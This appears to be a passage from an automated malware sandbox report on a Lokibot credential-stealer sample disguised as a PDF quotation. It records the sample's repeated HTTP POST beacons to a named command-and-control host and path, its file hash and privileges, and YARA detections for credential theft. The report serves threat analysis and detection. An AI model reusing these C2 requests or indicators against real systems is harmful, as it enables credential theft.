                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:30:06.788499117 CET9979INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:30:05 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  57192.168.2.549855104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:30:08.079184055 CET9980OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:30:08.526288986 CET9980INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:30:07 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  58192.168.2.549856104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:30:10.025450945 CET9981OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:30:10.304357052 CET9982INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:30:09 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.549764104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:24.754729986 CET1239OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:25.029998064 CET1240INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:24 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.549765104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:26.095199108 CET1241OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:26.366882086 CET1241INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:25 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.549766104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:27.825342894 CET1242OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:28.095748901 CET1242INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:27 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.549767104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:29.267836094 CET1243OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:29.534789085 CET1244INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:28 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:17:28:04
                  Start date:14/01/2022
                  Path:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
                  Imagebase:0x400000
                  File size:251901 bytes
                  MD5 hash:3FE29E21698212A70E03144BB4979632
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:17:28:05
                  Start date:14/01/2022
                  Path:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
                  Imagebase:0x400000
                  File size:251901 bytes
                  MD5 hash:3FE29E21698212A70E03144BB4979632
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >